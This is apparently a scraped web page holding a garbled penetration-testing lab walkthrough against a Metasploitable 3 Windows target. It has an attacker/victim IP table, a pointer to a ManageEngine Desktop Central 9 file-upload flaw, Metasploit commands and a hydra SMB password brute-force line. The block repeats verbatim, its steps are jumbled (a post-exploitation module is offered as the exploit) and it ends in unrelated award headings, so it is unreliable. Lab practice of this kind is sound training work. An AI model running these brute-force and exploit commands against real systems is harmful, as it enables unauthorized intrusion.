| Machine | Typical IP | |---------|-------------| | Kali Linux (Attacker) | 10.0.2.4 - 10.0.2.15 | | Metasploitable 3 Windows (Victim) | 10.0.2.5 - 10.0.2.6 |
An outdated version of ManageEngine Desktop Central 9 runs on port 8484, which is vulnerable to an arbitrary file upload exploit (CVE-2015-8249). Launch Metasploit: msfconsole . Search for and select the exploit module:
use post/multi/recon/local_exploit_suggester set SESSION run Use code with caution.
Here’s a typical end-to-end attack sequence against Metasploitable 3 Windows:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb
Execute the payload to gain an immediate high-privilege context shell: exploit Use code with caution. 4. Privilege Escalation
| Machine | Typical IP | |---------|-------------| | Kali Linux (Attacker) | 10.0.2.4 - 10.0.2.15 | | Metasploitable 3 Windows (Victim) | 10.0.2.5 - 10.0.2.6 |
An outdated version of ManageEngine Desktop Central 9 runs on port 8484, which is vulnerable to an arbitrary file upload exploit (CVE-2015-8249). Launch Metasploit: msfconsole . Search for and select the exploit module:
use post/multi/recon/local_exploit_suggester set SESSION run Use code with caution.
Here’s a typical end-to-end attack sequence against Metasploitable 3 Windows:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb
Execute the payload to gain an immediate high-privilege context shell: exploit Use code with caution. 4. Privilege Escalation
The TESOL Ron Chang Lee Award for Excellence in Classroom Technology
CATESOL Ron Lee Technology Award
---------------------------------------------
Testimonial
